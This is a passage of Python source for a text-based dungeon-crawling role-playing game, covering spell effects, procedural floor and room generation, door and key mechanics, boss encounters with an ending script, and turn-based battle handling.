dice(spelldef.value))\n if mem.hp <= 0 and \\\n mem.state not in [State.DEAD, State.ASHED, State.LOST]:\n mem.state = State.DEAD\n mw.print(f\"{mem.name} is killed.\", start=' ')\n else: # 'group' or 'all\n for mem in self.game.party.members:\n if spelldef.type == 'death':\n death_single(mem, mem_name)\n else:\n damage = dice(spelldef.value)\n mw.print(\n f\"{mem.name} incurred {damage} damage.\", start=' ')\n mem.hp = max(0, mem.hp - dice(spelldef.value))\n if mem.hp <= 0 and \\\n mem.state not in [State.DEAD, State.ASHED, State.LOST]:\n mem.state = State.DEAD\n mw.print(f\"{mem.name} is killed.\", start=' ')\n return\n if spelldef.target == 'group':\n if target.identified:\n disptarget = target.name\n else: # unidentified\n disptarget = self.game.mondef[target.name].unident\n if spell == 'shinoroi': # lakanito\n for mon in target.monsters:\n self.death_single(mon, disptarget)\n else:\n for mon in target.monsters:\n self.attack_single(\n mon, disptarget,\n spelldef.value, spelldef.attr, target, invoker)\n elif spelldef.target == 'all':\n for mong in self.game.battle.monp:\n if mong.identified:\n disptarget = mong.name\n else:\n disptarget = self.game.mondef[mong.name].unident\n for mon in mong.monsters:\n self.attack_single(mon, disptarget,\n spelldef.value, spelldef.attr, mong, invoker)\n elif spelldef.target == 'enemy':\n if target.identified:\n disptarget = target.name\n else:\n disptarget = self.game.mondef[target.name].unident\n if spelldef.type == 'death':\n self.death_single(target, disptarget)\n elif spell != 'butsumetsu' or \\\n self.game.mondef[target.name].type != 'undead':\n self.attack_single(target.monsters[0], disptarget,\n spelldef.value, spelldef.attr, target, invoker)\n monptmp = self.game.battle.monp[:]\n for mong in monptmp:\n mongtmp = mong.monsters[:]\n for mon in mongtmp:\n if mon.hp <= 0:\n mong.monsters.remove(mon)\n if not mong.monsters:\n self.game.battle.monp.remove(mong)\n\n def attack_single(self, mon, dispname, value, attr, mong, invoker):\n if mon.state == State.DEAD:\n return\n v = self.game.vscr\n mw = v.meswins[-1]\n damage = dice(value)\n mondef = self.game.mondef[mon.name]\n if mondef.regspellp > random.randrange(100):\n mw.print(f\"{dispname} registed.\")\n return\n if 'fire' in attr:\n if mondef.regfire:\n damage = damage // 2\n elif 'cold' in attr:\n if mondef.regcold:\n damage = damage // 2\n if 'poison' in attr:\n if not mondef.regpoison and random.randrange(100) < 50:\n mon.poisoned = True\n mon.hpplus = -1\n mw.print(f\"{dispname} was poisoned.\", start=' ')\n mon.hp = max(mon.hp-damage, 0)\n mw.print(f\"{dispname} incurred {damage} damage.\", start=' ')\n if mon.hp <= 0:\n mw.print(f\"{dispname} is killed.\", start=' ')\n mon.state = State.DEAD\n self.game.battle.exp += mondef.exp\n invoker.marks += 1\n\n def heal(self, invoker, spell, target):\n sdef = self.game.spelldef[spell]\n if not isinstance(invoker, Member):\n if sdef.target == 'party':\n for mon in self.game.battle.monp[0].monsters:\n self.heal_single(spell, sdef, mon)\n else:\n self.heal_single(spell, sdef, invoker)\n return\n if sdef.target == 'party':\n for target in self.game.party.members:\n self.heal_single(spell, sdef, target)\n else:\n self.heal_single(spell, sdef, target)\n\n def heal_single(self, sname, sdef, target):\n plus = dice(sdef.value)\n target.hp = min(target.hp+plus, target.maxhp)\n mw = self.game.vscr.meswins[-1]\n if target.hp == target.maxhp:\n mw.print(f\"{target.name}'s HP was fully restored.\", start=' ')\n else:\n mw.print(f\"{plus} HP was restored to 
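\n\n    # Hedged reference for the notation used above: spelldef.value holds a\n    # dice string such as '2D8' or '1D6+2', rolled by the module-level dice()\n    # helper defined near the end of this file, e.g.:\n    #   dice('2D8')   -> 2..16  (two eight-sided dice)\n    #   dice('1D6+2') -> 3..8   (one six-sided die plus 2)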
{target.name}.\", start=' ')\n\n\nclass Dungeon:\n \"\"\"\n Represents the dungeon\n \"\"\"\n\n def __init__(self, game):\n self.game = game\n self.floors = [] # list of floor objects\n self.events = [] # list of events (floor, eventid)\n self.generate_events()\n\n def generate_events(self):\n \"\"\"\n Generate important events when creating a dungeon.\n Later, events need to be placed on creating floors\n \"\"\"\n # generate keys\n self.events.append((Evloctype.RANDOM, 3, Eventid.KEY))\n self.events.append((Evloctype.RANDOM, 6, Eventid.KEY))\n self.events.append((Evloctype.RANDOM, 9, Eventid.KEY))\n self.events.append((Evloctype.RANDOM, 10, Eventid.KEY))\n\n # generate bosses\n self.events.append((Evloctype.DOWNSTAIRS, 3, Eventid.BOSS))\n self.events.append((Evloctype.DOWNSTAIRS, 6, Eventid.BOSS))\n self.events.append((Evloctype.DOWNSTAIRS, 9, Eventid.BOSS))\n self.events.append((Evloctype.DOWNSTAIRS, 10, Eventid.BOSS))\n\n def generate_move_floors(self):\n \"\"\"\n Check if floor_move, generate floors if not generated yet,\n and place party on the upstairs or the downstairs\n \"\"\"\n party = self.game.party\n if not party.floor_move:\n return\n\n floor = party.floor\n if party.floor_move == 1:\n floor += 1\n elif party.floor_move == 3:\n floor = party.tsubasa_floor\n for idx in range(floor):\n if len(self.floors) < idx+1:\n floor_obj = self.generate_floor(idx+1)\n self.floors.append(floor_obj)\n\n if party.floor_move == 1: # down; on the upstairs\n floor_obj = self.floors[party.floor]\n party.floor_obj = floor_obj\n party.move(floor_obj.rooms[0].center_x,\n floor_obj.rooms[0].center_y,\n floor=party.floor+1)\n elif party.floor_move == 2: # 2: up; on the downstairs\n floor_obj = self.floors[party.floor-2]\n party.floor_obj = floor_obj\n party.move(floor_obj.rooms[-1].center_x,\n floor_obj.rooms[-1].center_y,\n floor=party.floor-1)\n else: # tsubasa; on the upstairs\n floor_obj = self.floors[party.tsubasa_floor-1]\n party.floor_obj = floor_obj\n party.move(floor_obj.rooms[0].center_x,\n floor_obj.rooms[0].center_y,\n floor=party.tsubasa_floor)\n party.floor_move = 0\n\n for m in party.members:\n m.deepest = max(m.deepest, party.floor)\n\n def generate_floor(self, floor):\n \"\"\"\n Generate a dungeon floor.\n Create rooms, connect among them and place doors\n \"\"\"\n floor_x_size = min(256, 48 + 24*floor)\n floor_y_size = min(128, 20 + 10*floor)\n floor_data = bytearray(b'#' * floor_x_size *\n floor_y_size) # rock only floor\n floor_obj = Floor(floor_x_size, floor_y_size, floor, floor_data)\n\n rooms = floor_obj.prepare_rooms()\n for r in rooms:\n for y in range(r.y_size):\n start = (r.y + y)*floor_x_size + r.x\n floor_obj.floor_view[start:start+r.x_size] = b'.'*r.x_size\n floor_obj.connect_all_rooms(rooms)\n floor_obj.place_doors(self.game, rooms)\n floor_obj.rooms = rooms\n floor_obj.floor_orig = floor_obj.floor_data\n floor_obj.place_events(self)\n floor_obj.floor_data = bytearray(b'^' * floor_x_size * floor_y_size)\n return floor_obj\n\n def check_move_floor(self, floor_obj):\n \"\"\"\n Check if move to upper/lower floor.\n Return True if exit, False not.\n \"\"\"\n game = self.game\n party = game.party\n vscr = game.vscr\n meswin = vscr.meswins[0]\n\n if floor_obj.get_tile(party.x, party.y) == b'<': # upstairs\n vscr.disp_scrwin(floor_obj)\n if party.floor == 1:\n c = meswin.input_char(\"Exit from dungeon? (y/n)\",\n values=['y', 'n'])\n else:\n c = meswin.input_char(\n \"Stairs. Go up? 
(y/n)\", values=['y', 'n'])\n if c == 'y':\n party.floor_move = 2 # go up\n elif floor_obj.get_tile(party.x, party.y) == b'>': # downstairs\n vscr.disp_scrwin(floor_obj)\n c = meswin.input_char(\n \"Stairs. Go down? (y/n)\", values=['y', 'n'])\n if c == 'y':\n party.floor_move = 1 # go down\n\n if party.floor_move:\n if party.floor <= 1 and party.floor_move == 2: # exit from dungeon\n meswin.cls()\n party.place = Place.EDGE_OF_TOWN\n return True # Exit from dungeon\n\n return False\n\n\nclass Floor:\n # Represents a floor in the dungeon\n def __init__(self, x_size, y_size, floor, floor_data):\n self.x_size = x_size\n self.y_size = y_size\n self.floor = floor\n self.floor_data = floor_data\n self.floor_view = memoryview(floor_data)\n self.battled = []\n self.rooms = None\n self.up_x = self.up_y = 0\n self.down_x = self.down_y = 0\n self.events = {} # event list. key is (x, y), value is [eventID, done]\n\n def __repr__(self):\n s = self.floor_data.decode()\n return f\"Floor(size: {self.x_size}x{self.y_size}, floor: {self.floor} - {s})\"\n\n def ending(self, game):\n \"\"\"\n Show ending messages\n \"\"\"\n v = game.vscr\n v.cls()\n mw = v.meswins[-1]\n mw.print(\"Although defeated, the demonic figure looks intact.\")\n mw.print(\"He talked in a calm voice.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'Good. You are exceptionally good soldiers. I am impressed.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'You earthlings have defeated a self of mine. It was a good battle.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'You have just broken the self of order. Now, chaos has been brought to your world. Ancient gods and daemomns are released. You will see all kinds of plagues and disasters.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'To prevent it from happening, you will need to go further deep. Look for those gods and daemons, and defeat them.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'But, they are immortals. You can not just kill them. You need to defeat them again and again.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"'I will also wait for you again. Meet me at further deep down. My other selves want to have fun, too.'\",\n start=' ')\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"The demonic figure fell slient. And before your eyes, he started to become transparent, and disappeared in the air.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"You just knew that you have changed something important in a non-reversal way.\")\n v.disp_scrwin()\n getch(wait=True)\n\n def boss(self, game):\n v = game.vscr\n mw = Meswin(v, v.width//8, v.height//6,\n v.width*3//4, 4, frame=True)\n v.meswins.append(mw)\n if game.party.floor == 3:\n mw.print(\"You saw a small child standing on downstairs.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\"Suddenly, he srated running toward you.\")\n v.disp_scrwin()\n getch(wait=True)\n elif game.party.floor == 6:\n mw.print(\n \"You see a skinny woman wearing a chic black dress, as if she is going to a dinner party.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\"You thought you know her. 
She smiled at you.\")\n v.disp_scrwin()\n getch(wait=True)\n elif game.party.floor == 9:\n mw.print(\"In this high-ceiling room is a huge blue giant.\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\n \"You can't see his face, but it's evident that he is excited to see new preys.\")\n v.disp_scrwin()\n getch(wait=True)\n elif game.party.floor == 10:\n mw.print(\"'Welcome.' The demonic figure said.\")\n mw.print(\"'It has been long since I last met earthlings like you.'\")\n v.disp_scrwin()\n getch(wait=True)\n mw.print(\"He looks to be enjoying this encounter.\")\n v.disp_scrwin()\n getch(wait=True)\n game.vscr.meswins[-2].print(\"*** boss battle ***\")\n game.battle.boss = True\n game.battle.battle()\n game.battle.boss = False\n if not game.battle.treasure or \\\n not game.party.members: # lost the battle\n v.meswins.pop()\n return\n game.chest.chest()\n if game.party.defeated():\n v.meswins.pop()\n return\n survnum = sum(1 for m in game.party.members\n if m.state in [State.OK, State.ASLEEP,\n State.PARALYZED, State.STONED])\n mw.print(f\"Each survivor gets {game.battle.exp//survnum} e.p.\",\n start=' ')\n mw.print(f\"Each survivor gets {game.battle.gold//survnum} gold.\",\n start=' ')\n v.disp_scrwin()\n for mem in game.party.members:\n if mem.state == State.ASLEEP:\n mem.state = State.OK\n if mem.state in [State.OK, State.PARALYZED, State.STONED]:\n mem.exp += game.battle.exp//survnum\n mem.gold += game.battle.gold//survnum\n getch(wait=True)\n mw.cls()\n if game.party.floor == 10: # The last boss?\n self.ending(game)\n else:\n mw.print(\"You won the battle, but it was no ordinary monster.\")\n mw.print(\"You see downstairs appearing in front of you.\")\n v.disp_scrwin()\n getch(wait=True)\n v.meswins.pop()\n\n def key(self, game):\n if game.party.floor == 3:\n key = 'ivory'\n keys = ['ivory ley', 'bronze key', 'silver key', 'gold key']\n elif game.party.floor == 6:\n key = 'bronze'\n keys = ['bronze key', 'silver key', 'gold key']\n elif game.party.floor == 9:\n key = 'silver'\n keys = ['silver key', 'gold key']\n elif game.party.floor == 10:\n key = 'gold'\n keys = ['gold key']\n elif game.party.floor >= 11:\n key = 'one time password'\n keys = [key]\n if not game.party.have_items(keys):\n v = game.vscr\n mw = Meswin(v, v.width//8, v.height//6,\n v.width*3//4, 8, frame=True)\n v.meswins.append(mw)\n mw.print(f\"You see a {key} statue on a small stone table.\")\n mw.print(f\"The {key} statue is intricate and lively.\")\n mw.print(f\"You thought you need to touch the statue.\")\n if mw.input_char(\"Search? 
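\n\n    # Hedged gating note: the special '%' doors on floors 3/6/9/10 (and on\n    # every floor from 11 up) expect, in order: ivory key, bronze key, silver\n    # key, gold key, then a consumable 'one time password'; key() below places\n    # the matching statue event for the current floor.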
(y/n)\") == 'y':\n game.chest.get_item(key+' key')\n v.meswins.pop()\n v.disp_scrwin()\n\n def random_message(self, game):\n v = game.vscr\n mw = Meswin(v, v.width//8, v.height//6,\n v.width*3//4, 8, frame=True)\n v.meswins.append(mw)\n messages = random.choice(random_messages)\n for i, message in enumerate(messages):\n if i == 0:\n mw.print(message)\n v.disp_scrwin()\n else:\n getch(wait=True)\n mw.print(message, start=' ')\n v.disp_scrwin()\n mw.print(\" - press space bar\")\n v.disp_scrwin()\n while True:\n if getch(wait=True) == ' ':\n break\n v.meswins.pop()\n v.disp_scrwin()\n\n def check_event(self, game):\n \"\"\"\n Check and process an event.\n Return True if processed an event.\n \"\"\"\n x = game.party.x\n y = game.party.y\n if (x, y) not in self.events or self.events[(x, y)][1]:\n return False\n evid = self.events[(x, y)][0]\n if evid == Eventid.RNDMSG:\n self.random_message(game)\n self.events[(x, y)][1] = True # processed\n return True\n elif evid == Eventid.KEY:\n self.key(game)\n elif evid == Eventid.BOSS:\n self.boss(game)\n if game.party.members and not game.battle.ran:\n self.events[(x, y)][1] = True # processed\n return True\n return False # Will see the event again\n\n def place_events(self, dungeon):\n \"\"\"\n Place events on random or specific type location\n \"\"\"\n for ev in dungeon.events:\n if ev[1] != self.floor: # event[1] is floor\n continue\n if ev[0] == Evloctype.RANDOM:\n while True:\n x = random.randrange(self.x_size)\n y = random.randrange(self.y_size)\n if self.get_tile(x, y) == b'.': # floor tile\n break\n self.put_tile(x, y, b',')\n self.events[(x, y)] = [ev[2], False] # event[2] is eventid\n elif ev[0] == Evloctype.DOWNSTAIRS:\n x = self.rooms[-1].center_x\n y = self.rooms[-1].center_y\n self.events[(x, y)] = [ev[2], False] # eventid\n\n if self.floor >= 11:\n while True:\n x = random.randrange(self.x_size)\n y = random.randrange(self.y_size)\n if self.get_tile(x, y) == b'.': # floor tile\n break\n self.put_tile(x, y, b',')\n self.events[(x, y)] = [Eventid.KEY, False]\n\n # place random messages\n for _ in range(1 + random.randrange(2)): # 1 to 3 messages\n while True:\n x = random.randrange(self.x_size)\n y = random.randrange(self.y_size)\n if self.get_tile(x, y) == b'.': # floor tile\n break\n self.put_tile(x, y, b',')\n self.events[(x, y)] = [Eventid.RNDMSG, False]\n\n def get_tile(self, x, y):\n \"\"\"\n Return the byte character representing the tile on\n the specified (x, y) location\n \"\"\"\n if x >= self.x_size or x < 0:\n return b'^'\n if y >= self.y_size or y < 0:\n return b'^'\n pos = y * self.x_size + x\n return self.floor_orig[pos:pos+1]\n\n def put_tile(self, x, y, bc, orig=True):\n \"\"\"\n Place the tile byte character to (x, y) location.\n If orig flag is False, place it on the virtual map\n \"\"\"\n if 0 <= x < self.x_size and 0 <= y < self.y_size:\n pos = y * self.x_size + x\n if orig:\n self.floor_orig[pos:pos+1] = bc\n else:\n self.floor_data[pos:pos+1] = bc\n\n def can_move(self, x, y):\n \"\"\"\n Utility function to check if they can move to\n (x, y).\n \"\"\"\n bc = self.get_tile(x, y)\n if bc in b\"*+%#^\":\n return False\n return True\n\n def open_door(self, game, mw):\n \"\"\"\n Open a door. If it's a locked door ('*'), unlock and\n open it. Unlock could fail.\n \"\"\"\n x = game.party.x\n y = game.party.y\n c = mw.input_char(\"Which direction? 
- ;)leave\",\n values=['h', 'j', 'k', 'l', ';'])\n if c == ';':\n return\n elif c == 'h':\n x -= 1\n elif c == 'l':\n x += 1\n elif c == 'j':\n y += 1\n elif c == 'k':\n y -= 1\n tile = self.get_tile(x, y)\n if tile == b'+':\n mw.print(\"Opened.\")\n self.put_tile(x, y, b'.')\n elif tile == b'*':\n if game.party.can_open(game):\n mw.print(\"Unlocked.\")\n self.put_tile(x, y, b'.')\n else:\n mw.print(\"No luck.\")\n elif tile == b'%':\n if game.party.can_open(game, ch=b'%'):\n mw.print(\"Unlocked.\")\n self.put_tile(x, y, b'.')\n if game.party.floor >= 11:\n game.party.consume_item('one time password')\n else:\n mw.print(\"You need the key.\")\n else:\n mw.print(\"Not a door.\")\n\n def draw_line(self, x1, y1, x2, y2):\n \"\"\"\n Utility generator function to draw a straight line.\n Must eithr be vertical (x1==x2) or horizontal (y1==y2).\n \"\"\"\n if x1 < x2:\n x1, x2 = x2, x1\n if y1 < y2:\n y1, y2 = y2, y1\n while x1 > x2 or y1 > y2:\n yield x2, y2\n if x1 > x2:\n x2 += 1\n if y1 > y2:\n y2 += 1\n yield x2, y2\n\n def connect_rooms(self, r1, r2):\n \"\"\"\n Create a hallway between two rooms and connect them.\n \"\"\"\n if random.randrange(2) == 0: # 1/2\n cx = r1.center_x\n cy = r2.center_y\n else:\n cx = r2.center_x\n cy = r1.center_y\n for x, y in self.draw_line(r1.center_x, r1.center_y, cx, cy):\n pos = self.x_size * y + x\n self.floor_view[pos:pos+1] = b'.'\n for x, y in self.draw_line(r2.center_x, r2.center_y, cx, cy):\n pos = self.x_size * y + x\n self.floor_view[pos:pos+1] = b'.'\n\n def prepare_rooms(self):\n \"\"\"\n Return a list filled with Rooms objects on a floor.\n \"\"\"\n rooms = []\n for _ in range(1024):\n rx = 3 + random.randrange(10)\n ry = 3 + random.randrange(4)\n room = Room(random.randrange(self.x_size-rx+1),\n random.randrange(self.y_size-ry+1),\n rx, ry)\n intersect = False\n for r in rooms:\n if room.rooms_intersect(r):\n intersect = True\n break\n if not intersect:\n rooms.append(room)\n self.battled.append(False)\n return rooms\n\n def connect_all_rooms(self, rooms):\n \"\"\"\n Connect all rooms with hallways.\n Try to find and connect with the nearest room.\n \"\"\"\n rooms.sort(key=lambda room: room.y+room.y_size//2)\n rooms.sort(key=lambda room: room.x+room.x_size//2)\n rs = rooms[:]\n r_src = rs.pop()\n newrooms = [r_src]\n while rs:\n idx_near = 0\n len_rs = len(rs)\n for i in range(len_rs): # look for the nearest room\n if r_src.distsq_rooms(rs[i]) < r_src.distsq_rooms(rs[idx_near]):\n idx_near = i\n r_near = rs.pop(idx_near)\n self.connect_rooms(r_src, r_near)\n r_src = r_near\n newrooms.append(r_src)\n rooms = newrooms\n\n def place_door(self, x, y, dc):\n \"\"\"\n Utility function to check and place a door\n \"\"\"\n if 0 <= x < self.x_size and 0 <= y < self.y_size:\n pos = y*self.x_size + x\n c = self.floor_view[pos:pos+1]\n if c == b'.' 
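\n\n    # Hedged sketch of the layout pass above: prepare_rooms() keeps only\n    # non-overlapping room candidates, and connect_all_rooms() repeatedly\n    # links the current room to its nearest unvisited neighbour with one or\n    # two straight corridors, so the whole floor ends up connected.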
\n\n    def place_door(self, x, y, dc):\n        """\n        Utility function to check and place a door\n        """\n        if 0 <= x < self.x_size and 0 <= y < self.y_size:\n            pos = y*self.x_size + x\n            c = self.floor_view[pos:pos+1]\n            if c == b'.' or c == b'+':\n                self.floor_view[pos:pos+1] = dc\n\n    def place_doors(self, game, rooms):\n        """\n        Place locked or unlocked doors in front of rooms.\n        """\n        for r in rooms:\n            dc = b'+'  # door character\n            if random.randrange(10) == 0:  # 10%\n                dc = b'*'  # locked door\n            if (self.floor in [3, 6, 9, 10] or self.floor >= 11) \\\n               and r is rooms[-1]:\n                dc = b'%'  # special locked door that requires a key\n            for x in range(r.x_size):  # top and bottom edges\n                self.place_door(r.x+x, r.y-1, dc)\n                self.place_door(r.x+x, r.y+r.y_size, dc)\n\n            for y in range(r.y_size):  # left and right edges\n                self.place_door(r.x-1, r.y+y, dc)\n                self.place_door(r.x+r.x_size, r.y+y, dc)\n\n            if r == rooms[0]:\n                pos = r.center_y*self.x_size + r.center_x\n                self.floor_view[pos:pos+1] = b'<'  # up stair\n                self.up_x = r.center_x\n                self.up_y = r.center_y\n\n            if r == rooms[-1]:\n                pos = r.center_y*self.x_size + r.center_x\n                self.floor_view[pos:pos+1] = b'>'  # down stair\n                self.down_x = r.center_x\n                self.down_y = r.center_y\n\n\nclass Room:\n    # Represents a room on a dungeon floor\n    def __init__(self, x, y, x_size, y_size):\n        self.x = x\n        self.y = y\n        self.x_size = x_size\n        self.y_size = y_size\n        self.center_x = x + x_size//2\n        self.center_y = y + y_size//2\n\n    def __repr__(self):\n        return f"Room(x/y: {self.x}/{self.y}, size: {self.x_size}/{self.y_size})"\n\n    def in_room(self, x, y):\n        """\n        Return True if (x, y) is inside the room\n        """\n        if self.x <= x < self.x+self.x_size:\n            if self.y <= y < self.y+self.y_size:\n                return True\n        return False\n\n    def rooms_intersect(self, r):\n        """\n        Return True if two rooms intersect.\n        """\n        return max(self.x, r.x) <= min(self.x+self.x_size, r.x+r.x_size) \\\n            and max(self.y, r.y) <= min(self.y+self.y_size, r.y+r.y_size)\n\n    def distsq_rooms(self, r):\n        """\n        Return the squared distance between the centers of two rooms.\n        """\n        return (self.x+self.x_size//2 - (r.x+r.x_size//2))**2 \\\n            + (self.y+self.y_size//2 - (r.y+r.y_size//2))**2\n\n\nclass Monster:\n    """\n    Represents a monster\n    """\n\n    def __init__(self, game, name):\n        self.game = game\n        self.name = name\n        self.mdef = self.game.mondef[name]\n        self.hp = self.maxhp = dice(self.mdef.hp)\n        self.hpplus = 0\n        self.ac = self.mdef.ac\n        self.state = State.OK\n        self.silenced = False\n        self.poisoned = False\n\n\nclass Monstergrp:\n    """\n    Represents a monster group\n    """\n\n    def __init__(self, game, name):\n        self.game = game\n        self.name = name\n        self.mdef = self.game.mondef[name]\n        self.monsters = []\n        self.identified = False\n\n\nclass Battle:\n    """\n    Represents battles\n    """\n\n    def __init__(self, game):\n        self.game = game\n        self.boss = False\n        self.ran = False  # ran from the battle flag\n        v = game.vscr\n        self.mw = Meswin(v, v.width//8, v.height//8+4,\n                         v.width*3//4, 10, frame=True)\n        self.ew = Meswin(v, v.width//8, v.height//8-1,\n                         v.width*3//4, 4, frame=True)\n\n    def new_battle(self):\n        """\n        Clear variables for a new battle\n        """\n        self.friendly = False\n        self.exp = 0  # gained exp from this battle\n        self.gold = 0  # gained gold from this battle\n        self.room_index = -1  # random encounter\n        self.monp = []  # includes monster group(s)\n        self.entities = []  # includes party member or monster\n        self.treasure = True  # a chest may drop after the battle\n        if random.randrange(100) < 10:\n            self.surprised = 1  # you surprised the monsters\n        elif random.randrange(100) < 10:\n            self.surprised = 2  # monsters surprised you\n        else:\n            self.surprised = 0\n        self.ran = False  # ran flag\n        for m in self.game.party.members:\n            m.action = '????????????'\n            
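# clear per-battle member flags: level-drain guard, temporary AC, silence\n            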
m.drained = False\n            m.acplus = 0\n            m.silenced = False\n\n    def draw_ew(self):\n        """\n        draw enemy window that lists the monster groups and number\n        of monsters in them\n        """\n        self.ew.cls()\n        for i, mg in enumerate(self.monp, 1):\n            active = 0\n            if self.friendly or self.game.party.identify:\n                mg.identified = True\n            if mg.identified:\n                dispname = mg.name\n                if len(mg.monsters) > 1:\n                    dispname = mg.mdef.names\n            else:\n                dispname = mg.mdef.unident\n                if len(mg.monsters) > 1:\n                    dispname = mg.mdef.unidents\n            for m in mg.monsters:\n                if m.state in [State.OK]:\n                    active += 1\n            self.ew.print(\n                f"{i}) {len(mg.monsters)} {dispname.ljust(24)} ({active})", start=' ')\n\n    def create_monsterparty(self):\n        """\n        Create a monster party and save it to self.monp\n        """\n        if self.boss:\n            bosses = {\n                3: 'daemon kid',\n                6: 'the lady',\n                9: 'atlas',\n                10: 'daemon lord',\n            }\n            mname = bosses[self.game.party.floor]\n        else:\n            candidates = []\n            for mname in self.game.mondef:\n                if self.game.party.floor <= 10:\n                    if self.game.party.floor in self.game.mondef[mname].floors:\n                        candidates.append(mname)\n                else:\n                    if 0 in self.game.mondef[mname].floors:\n                        candidates.append(mname)\n            mname = random.choice(candidates)\n            if mname == '':\n                breakpoint()  # should never happen; drop into the debugger\n        self.friendly = False\n        while len(self.monp) < 4:  # up to 4 groups\n            mdef = self.game.mondef[mname]\n            if len(self.monp) == 0:  # 1st group\n                if mdef.friendly and random.randrange(100) < 10:  # 1/10\n                    self.friendly = True\n\n            mong = Monstergrp(self.game, mname)\n            self.monp.append(mong)\n            for _ in range(dice(mdef.number)):\n                mon = Monster(self.game, mname)\n                mong.monsters.append(mon)\n            self.gold += mdef.level * (random.randrange(15) + 10)\n            if mdef.fellowp <= random.randrange(100):\n                break\n            mname = mdef.fellow\n        # top monster defines treasure levels; copy, as Chest.treasure() pops from it\n        self.game.chest.items = list(self.monp[0].mdef.treasure)\n        return\n\n    def canrun(self, entity):\n        """\n        Return True if the entity (party member or monster) runs away\n        from the battle successfully\n        """\n        if isinstance(entity, Monster):\n            if 65 > random.randrange(100):\n                return True\n            else:\n                return False\n        success = pl = el = 0\n        for mg in self.monp:\n            for m in mg.monsters:\n                if m.state == State.OK:\n                    el += self.game.mondef[m.name].level\n        for mem in self.game.party.members:\n            if mem.state == State.OK:\n                pl += mem.level\n        if pl > el:\n            success += 20\n\n        if len(self.game.party.members) == 1:\n            success += 15\n        elif len(self.game.party.members) == 2:\n            success += 10\n        elif len(self.game.party.members) == 3:\n            success += 5\n\n        if success + 75 > random.randrange(100):\n            return True\n        else:\n            return False\n\n    def handle_friendly(self, place):\n        """\n        Handle friendly monsters.\n        Return True if leave, False if fight\n        """\n        v = self.game.vscr\n        if len(self.monp) > 1:\n            dispname = 'monsters'\n        else:\n            mong = self.monp[0]\n            if mong.identified:\n                dispname = mong.name\n                if len(mong.monsters) > 1:\n                    dispname = mong.mdef.names\n            else:\n                dispname = mong.mdef.unident\n                if len(mong.monsters) > 1:\n                    dispname = mong.mdef.unidents\n        if self.friendly:\n            self.surprised = 0\n            self.mw.print(f"You encountered friendly {dispname}.")\n            c = self.mw.input_char("Leave? 
(y/n)\", values=['y', 'n'])\n if c == 'y':\n idx = self.room_index\n if idx >= 0: # room encounter\n self.game.party.floor_obj.battled[idx] = True\n return True\n else:\n self.mw.print(f\"You encountered {dispname}.\")\n return False\n\n def enemy_action(self):\n \"\"\"\n Decide enemy/monster actions\n \"\"\"\n if self.surprised == 1: # you surprised the monsters\n return\n mondef = self.game.mondef\n party = self.game.party\n for mong in self.monp:\n for mon in mong.monsters:\n if mon.state != State.OK:\n continue\n action = mondef[mong.name].act[random.randrange(5)]\n agi = mondef[mong.name].agi + random.randrange(4)\n if action == 'run':\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'run', None))\n elif action == 'breath':\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'breath', None))\n elif action == 'atk' or self.surprised == 2:\n targets = [mem for mem in party.members\n if mem.state in [State.OK, State.ASLEEP]]\n if len(targets) > 3:\n if party.floor > 3 and random.randrange(100) < 40:\n target = random.choice(targets)\n else:\n target = targets[random.randrange(3)]\n else:\n target = random.choice(targets)\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'fight', target))\n else:\n if action in self.game.spelldef:\n self.entities.append(\n Entity(mon, mong.name, mong, agi, action, None))\n else:\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'parry', None))\n\n def input_action(self):\n \"\"\"\n Input party member actions\n return True if ran successfully\n \"\"\"\n self.entities = []\n for mem in self.game.party.members:\n mem.action = '????????????'\n if self.surprised == 2: # monsters surprised you\n return False\n while True:\n self.mw.print(f\"Options - f)ight s)pell u)se\")\n self.mw.print(f\"d)ispell p)arry r)un t)ake back\", start=' ')\n for idx, mem in enumerate(self.game.party.members, 1):\n if mem.state not in [State.OK]:\n continue\n while True:\n c = self.mw.input_char(f\"{mem.name}'s action?\",\n values=['f', 's', 'u', 'p', 'r', 't', 'd'])\n agi = mem.stat[4] + random.randrange(5)\n if c == 'r':\n if self.canrun(mem):\n return True\n else:\n return False # failed\n elif c == 't':\n self.entities = []\n for mem in self.game.party.members:\n mem.action = '????????????'\n self.mw.print(\"..taking back\")\n self.game.vscr.disp_scrwin()\n break\n elif c == 'p':\n mem.action = 'parry'\n self.entities.append(\n Entity(mem, mem.name, None, agi, 'parry', None))\n self.game.vscr.disp_scrwin()\n break\n elif c == 'f':\n wrange = 'short'\n for item in mem.items:\n idef = self.game.itemdef[item[0]]\n if item[1] and idef.type.lower() == 'weapon' \\\n and idef.range.lower() == 'long':\n wrange = 'long'\n if idx > 3 and wrange == 'short':\n self.mw.print(\"Weapon range too short.\")\n self.game.vscr.disp_scrwin()\n continue\n mong = self.monp[self.choose_group()]\n self.entities.append(\n Entity(mem, mem.name, None, agi, 'fight', mong))\n mem.action = 'fight'\n self.game.vscr.disp_scrwin()\n break\n elif c == 'd':\n if mem.job not in [Job.PRIEST, Job.BISHOP, Job.LORD]:\n continue\n mong = self.monp[self.choose_group()]\n self.entities.append(\n Entity(mem, mem.name, None, agi, 'dispell', mong))\n mem.action = 'dispell'\n self.game.vscr.disp_scrwin()\n break\n elif c == 's':\n if self.surprised == 1: # you surprised the monsters\n continue\n s, target = self.choose_spell(mem)\n self.entities.append(\n Entity(mem, mem.name, None, agi, s, target))\n mem.action = s\n self.game.vscr.disp_scrwin()\n break\n elif c == 'u':\n item, target = 
